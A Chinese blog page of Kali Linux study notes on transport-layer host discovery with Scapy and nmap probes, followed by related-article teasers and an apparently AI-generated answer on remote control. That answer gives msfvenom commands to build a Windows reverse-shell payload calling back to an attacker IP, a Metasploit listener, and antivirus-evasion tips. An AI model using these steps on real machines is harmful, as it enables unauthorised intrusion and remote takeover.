KALI之四层发现

最新推荐文章于 2022-06-29 15:21:34 发布
最新推荐文章于 2022-06-29 15:21:34 发布
阅读量237 收藏
点赞数 1
文章标签: nmap 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hacker681/article/details/103765159
版权

四层发现
可路由且结果可靠
不太可能被防火墙过滤
甚至可以发现所有端口都被过滤的主机
缺点
特别严格的基于状态过滤的防火墙可能过滤扫描
全端口扫描速度慢
TCP
未经请求的ACK-RST
SYN-SYN/ACK、RST
UDP
ICMP端口不可达、一去不复返

Scapy 四层发现

i=IP()
t=TCP()
 r=(i/t)
r[IP].dst="192.168.1.1"
r[TCP].flags="A"
a=sr1(r)
r.display()

我没经过三次握手就发了这个ACK的包如果你给我返回reset了就说明你的主机在线。如果没反应就是不在线

也可以使用一行的方式做上面这些动作,为什么要用一行呢?那是因为为了方便后续做脚本

a=sr1(IP(dst="192.168.1.1")/TCP(dport=80,flags="A"), timeout=1)

上面都是TCP主机的发现

UDP主机发现

如果ip存在,我们将无法收到回应
反而:如果ip不存在,我们就会收到ICMP的不可达信息
所以,要注意使用时最好发送到基本不会使用到的端口

u=UDP()
i=IP()
r=(i/u)
r[IP].dst="192.168.1.1"
u.dport= 33333
a=sr1(r)

这种方式其实通常无法满足我们的需求;

实际总是运用多种方式,arping,tcp等等结合在一起使用

**nmap 如果觉得scapy很麻烦的话可以用nmap

三四层扫描领域是无敌的状态使用nmap也可以实现通过scapy通过脚本编写的TCP/UDP的这种四层扫描
nmap就不需要编写这么多代码一个参数一个指令就可以完成**

nmap想实现四层主机发现可以使用

nmap IP地址-254 -PU后面跟上端口 -sn

想调用文本里的IP就用

nmap -iL 文本文件 -PA80(这里的PA80可以根据参数依葫芦画瓢) -sn

nmap IP地址 不仅会实现四层发现也会扫描端口
主机发现的参数

-PS 是SYN协议的发现方式
-PY 是SCT协议的发现方式 使用场景少
-PE ICMP的ping包
-PP 时间戳
-PM 请求IP的netmask
-PO IP协议的ping

如果我发flag0 他给我返回ACK、RST那么hping3就会认为这个IP是活着的
发现技术是发现活着的IP是可以通信的IP不是端口
hping在tcp的发现阶段准确性不是那么高

HABH
关注
KALI使用】17 主动信息收集——四层发现(TCP、UDP、使用 scapy 定刢数据迕行高级扫描)
(∪.∪ )...zzz的博客
10-14 591
目录四层发现优缺点TCP发现使用scrapy发送3、4层组合头长组合语句脚本UDP 只是记录 学习笔记 参考:这个 四层发现优缺点 使用TCP/UDP协议(TCP、UDP各65535个端口) 优点: 可路由且结果可靠; 不太可能被防火墙过滤掉; 甚至可以发现所有端口都被过滤的主机 缺点: 基于状态过滤的防火墙可能过滤扫描; 全端口扫描速度慢 原理: 二、三、四层发现的目的都是发现网络中存活的IP地址。 四层发现 针对 端口的探测 来识别主机是否在线, 目标IP某个端口没有开放,会给我
Kali Linux 渗透测试之主动信息收集(三)——四层发现(TCP、UDP、scapy、Nmap、Hping3)
橘子女侠
04-13 1590
发现——四层发现 四层发现简介: 四层发现虽然使用了端口的探测,但是并不对端口进行解析,只是利用了四层的通信,通过端口识别目标主机是否存活; 最终目的,判断目标IP是否存活; 优点: 可路由且结果可靠(根据TCP/UDP 探测端口,根据端口返回的结果,探测目标IP是否存活) 不太可能被防火墙过滤; 甚至可以发现所有端口都被过滤的主机...
四层发现
_LsOutLook
04-23 331
发现的目的是扫描出可能存活的IP地址,四层发现虽然涉及端口扫描,但是并不对端口的状态进行识别,其本质是利用四层协议的一些通信来识别主机ip是否存在 TCP探测 传统TCP连接是通过三次握手建立通信过程,然后可以向目标发送资源申请的请求,本机再发送ack进行确认,这是一种基于连接的可靠的通信协议。如果我们之前没有建立TCP连接,而是直接向目标发送ack,这时目标服务器回想本机发送一个RST...
3-3主机发现-四层发现
山兔的博客
06-29 300
四层发现指利用OSI中的传输层协议进行主机发现,一般情况下,四层协议括TCP、UDP优点:1、可以探测远程主机,经过路由也能探测2、比三层发现更为可靠,因为三层使用的ICMP协议,有可能被防火墙过滤缺点:花费时间比较长,相比于二层发现和三层发现kali linux自带的NMAP可以进行二、三、四层的探测,我们接下来演示nmap探测直接使用 nmap IP地址 来探测,nmap会进行对应的端口扫描,以及主机发现,可以对二、三、四 先获取IP地址 这样的探测过程是比较准确的,因为nmap除了调用四层,还
Kali学习笔记8:四层发现
weixin_30448685的博客
07-14 134
1.基于TCP协议 优点: 1.可路由且结果可靠 2.不太可能会被防火墙过滤 3.甚至可以发现端口 缺点: 速度较慢(三次握手) 利用Scapy发送ACK数据: 配置数据发送数据: 看一下收到数据的结果: 这里收到Reset,只要ip存在,无论这个端口是否开放,都会返回Reset数据。 我们抓...
渗透测试技术----主动信息收集(三)--四层发现(TCP、UDP、nmap)
wwl012345的博客
07-17 1043
一、四层发现 原理:使用TCP/UDP协议 优点: (1):可以进行路由并且扫描结果比较可靠 (2):不太可能被防火墙过滤掉 缺点: (1):基于状态过滤的防火墙可能过滤扫描 (2):全端口扫描速度慢 ...
Kali渗透测试之主动信息收集3——四层发现(TCP、UDP、nmap、hping3)
浅浅的博客
04-13 993
四层发现 原理:使用TCP/UDP协议(TCP、UDP各65535个端口) 优点:可路由且结果可靠;不太可能被防火墙过滤掉;甚至可以发现所有端口都被过滤的主机 缺点:基于状态过滤的防火墙可能过滤扫描;全端口扫描速度慢 二、三、四层发现的目的都是发现网络中存活的IP地址。四层发现针对端口的探测来识别主机是否在线,并不对端口状态进行识别,其本质是利用四层协议来识别目标IP是...
kali渗透测试之主动信息收集1——二层发现(arping、nmap、Netdiscover、scapy)
浅浅的博客
04-08 1427
一、主动信息搜集 被动信息收集可能不准确,可以用主动信息收集验证 特点: 直接与目标系统交互通信 无法避免留下访问的痕迹 解决方法: 使用代理或已经被控制的第三方电脑进行探测(做好被封杀的准备) 使用噪声迷惑目标,淹没真实的探测流量 扫描:发送不同的探测,根据返回结果判断目标状态 1.主机发现 二层主机发现 三层主机发现kali渗透测试之主动信息收集2——三层发现(pi...
Kali linux 学习笔记(十二)主动信息收集——四层发现nmap、scapy、hping) 2020.2.21
闵行小鱼塘
02-21 767
四层发现可路由且结果可靠,不太会被防火墙过滤,可以发现所有端口被过滤的主机,但是全端口扫描速度慢 主要有TCP、UDP两种协议 工具:nmap、scapy、hping
四层发现-TCP和UDP发现简介
weixin_30920853的博客
07-29 158
虽然这里使用到了端口发现,但是四层发现阶段并不对端口进行解析,而是通过端口进行对ip是否存活的判断。 这里是对主机的发现,而不是对端口的识别。 四层发现的结果比三层发现的结果更加精确,基本不会被防火墙过滤,甚至可以发现所有端口都被过滤的主机。但是扫描速度比较慢。 TCP发现:直接发送ACK数据,一般来说状态为up的目标主机会返回一个RST数据以终止这个不正常的TCP链接。也可以...
小白日记9:kali渗透测试之主动信息收集(二)四层发现:TCP、UDP、nmap、hping、scapy
ZiXuanFY的博客
09-11 2476
四层发现 四层发现的目的是扫描出可能存活的IP地址,四层发现虽然涉及端口扫描,但是并不对端口的状态进行精确判断,其本质是利用四层协议的一些通信来识别主机ip是否存在。 四层发现的优点: 1、可路由且结果可靠; 2、不太可能被防火墙过滤,甚至可以发现所有端口都被过滤的主机。[一些比较严格的防火墙还是会过滤掉]   缺点:是基于状态过滤的防火墙可能过滤扫描;全端口
信息搜集 - 四层发现 Nmap
发哥微课堂
11-08 707
0x00:简介 四层发现主要利用 tcp 和 udp,而除了 scapy 外,nmap 无疑也是一个很强大的工具。 0x01:nmap 四层发现 首先,来看一下主要用到的参数,如下图: 红框中的参数分别是 PS、PA、PU、PY,扫描类型代表是 syn、ack、udp、sctp。 nmap四层使用 udp 做发现命令格式是:namp 1.1.1.0/24 -PU22222 -sn...
Kali Linux 渗透测试之主动信息收集(四)——四层发现之端口扫描(scapy、nmap、dmitry、python socket、amap、)
weixin_45116657的博客
08-15 712
端口扫描 1、nmap 1.1> nmap -sU nmap -sU 192.168.85.152 # -sU扫描udp 默认的1000个参数(端口) root@kali:~# nmap -sU 192.168.85.152 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 21:01 CST Nmap scan report...
主动信息收集——四层发现(传输层)
weixin_43229308的博客
11-26 174
TCP、UDP协议详解:https://blog.youkuaiyun.com/tonglin12138/article/details/86470433 缺点:基于状态过滤的防火墙可能过滤扫描,全端口扫描速度慢 TCP扫描: 不发送SYN,直接发送ACK,目标主机若存在,则返回一个RST 正常发送TCP链接请求,发送SYN,目标主机不存在则没有返回,存在且中端口号等信息正确,则返回SYN/...
kali linux 渗透测试技术详解》了解一下
好好学习,天天向上
07-25 5197
kali linux 渗透测试技术详解 渗透测试: 通过模拟恶意黑客的攻击方法, 来评估计算机网络系统安全的一种评估方法, 这个分析是从一个攻击者可能存在的位置来进行的 并且从这个位置有条件主动利用安全漏洞 是一个渐进的且逐步深入的过程 是选择不影响业务系统正常运行的攻击方法进行测试 service apache2 start service ssh start ssh 连...
Kali Linux 渗透测试之主动信息收集(三)——四层之主机发现(TCP、UDP、scapy、Nmap、Hping3)
weixin_45116657的博客
08-15 1652
发现——四层发现 四层发现简介: 四层发现虽然使用了端口的探测,但是并不对端口进行解析,只是利用了四层的通讯,通过端口识别目标主机是否存活; 最终目的是判断目标IP是否存活; 优点: 可路由且结果可靠(根据TCP/UDP探测端口,根据端口返回的结果,探测目标IP是否存活); 不太可能被防火墙过滤; 甚至可以发现所有端口都被过滤的主机; 缺点: 基于状态过滤的防火墙可能过滤扫描; ...
Linux怎样返回上一层目录的命令:
热门推荐
qq_24251645的博客
04-15 1万+
Linux怎样返回上一层目录的命令: 回到上一级目录:cd… 回到上一次目录:cd-(可穿越多层) vi指令进入的文件如何退出: 按下【ESC】 输入“:”冒号,再输入wq!代表保存退出,q!代表强制退出不保存 Linux中将文件夹下的所有文件复制到另一个文件里: 1.在/TEST目录下新建test1和test2两个子文件夹。 假设复制源文件test1下的test01文件,目标目录为t...
Kali Linux渗透测试之端口扫描(一)——UDP、TCP、隐蔽端口扫描、全连接端口扫描
橘子女侠
04-14 7081
端口扫描 二、三、四层发现的目的就是发现存活的IP,在存活的IP上面,展开进一步的扫描,及端口扫描,发现存活主机上存在着哪些开放的端口,端口后面就对应着各种各样的应用程序,应用程序的漏洞都是通过端口体现出来的,所以,扫描端口为我们后续的攻击提供更大的攻击面。 端口对应网络服务及应用端程序; 服务端程序的漏洞通过端口攻入; 发现开放的端口; 更具体的攻击面; 1. UDP端口扫描 ...
kali基础命令(二)
不秃头的程序Yang
04-21 3649
文件夹或文本操作 1、显示当前工作路径 pwd 2、返回上一级目录 cd .. 3、进去当前用户主目录 cd ~ 4、创建文件 touch test.txt 5、创建文件夹 mkdir test 6、显示文件和文件夹名 ls 显示文件和文件夹名 ls -a 显示所有的文件和文件夹 含隐藏文件 ls -l 显示文件和目录的详细资料 7、删除 rm -rf 文件/文件夹 ...
kali远控电脑
最新发布
05-30
<think>嗯,用户想了解在Kali Linux上实现远程控制电脑的方法或工具。首先,我需要回忆一下KaliLinux常用的远程控制工具,比如SSH、VNC、RDP这些内置的,还有Metasploit这样的渗透测试框架里的模块。用户可能对安全领域比较感兴趣,或者有合法的远程管理需求,但也要注意提醒他们遵守法律法规。 根据用户提供的引用,里面提到了SSH、VNC、RDP,还有使用msfvenom生成payload以及免杀技巧。需要确保回答覆盖这些工具,同时可能还要提到其他工具如Metasploit的Meterpreter。另外,用户可能关心如何配置和使用这些工具,所以分步骤说明会比较清晰。还要注意引用中的内容,比如引用[1]提到多种工具,引用[2]和[4]涉及Metasploit和msfvenom生成木马,引用[3]讨论免杀方法。需要将这些信息整合到回答中,并正确标注引用来源。用户可能需要具体操作步骤,比如如何通过SSH连接,如何设置VNC服务器,或者如何使用Metasploit进行反向连接。同时,安全问题也很重要,比如使用SSH密钥认证,避免使用弱密码,以及法律风险提示。在生成相关问题的时候,应该考虑用户可能进一步询问的方面,比如性能优化、安全加固、故障排除或者法律问题。确保问题覆盖不同层次的需求,从基础配置到高级应用,甚至伦理考量。 最后,检查回答是否符合系统级指令:行内公式正确使用$...$,独立公式用$$...$$,但这里可能用不上数学公式。确保LaTeX语法正确,使用中文回答,生成相关问题,并在引用处添加标识。结构要清晰,分点说明每个工具的方法,步骤详细,同时真实可靠。</think>### Kali Linux远程控制电脑的方法与工具 Kali Linux是专为渗透测试设计的操作系统,内置多种远程控制工具。以下是常用的方法及操作步骤: --- #### 一、基于SSH的远程控制 SSH(Secure Shell)是加密的远程登录协议,适用于命令行控制。 1. **安装SSH服务**: ```bash sudo apt update && sudo apt install openssh-server ``` 2. **启动服务**: ```bash sudo systemctl start ssh ``` 3. **远程连接**(从其他设备): ```bash ssh username@目标IP地址 ``` **注意**:需确保目标设备已开启SSH服务[^1]。 --- #### 二、图形化工具:VNC与RDP 1. **VNC(Virtual Network Computing)**: - **安装TightVNC**: ```bash sudo apt install tightvncserver ``` - **启动VNC服务器**: ```bash vncserver :1 -geometry 1280x800 ``` - **客户端连接**:使用`Remmina`或`RealVNC Viewer`输入目标IP和端口(如`IP:5901`)。 2. **RDP(Remote Desktop Protocol)**: - **安装xrdp**: ```bash sudo apt install xrdp ``` - **连接**:Windows使用`mstsc.exe`,Linux使用`Remmina`,输入目标IP地址。 --- #### 三、渗透测试工具:Metasploit Framework 用于生成反向连接Payload(需合法授权)。 1. **生成Payload**: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=端口 -f exe > payload.exe ``` 此命令生成Windows可执行文件`payload.exe`[^4]。 2. **监听控制端**: ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击机IP set LPORT 端口 exploit ``` 目标运行`payload.exe`后,攻击机获得Meterpreter会话[^2]。 --- #### 四、安全与法律注意事项 1. **免杀技术**:通过编码、加密或加壳绕过杀毒软件检测(如使用`msfvenom`的`-e`参数编码)[^3]。 2. **合法授权**:未经授权的远程控制可能触犯法律。 3. **防护建议**:目标设备应安装杀毒软件(如360卫士)并定期更新[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值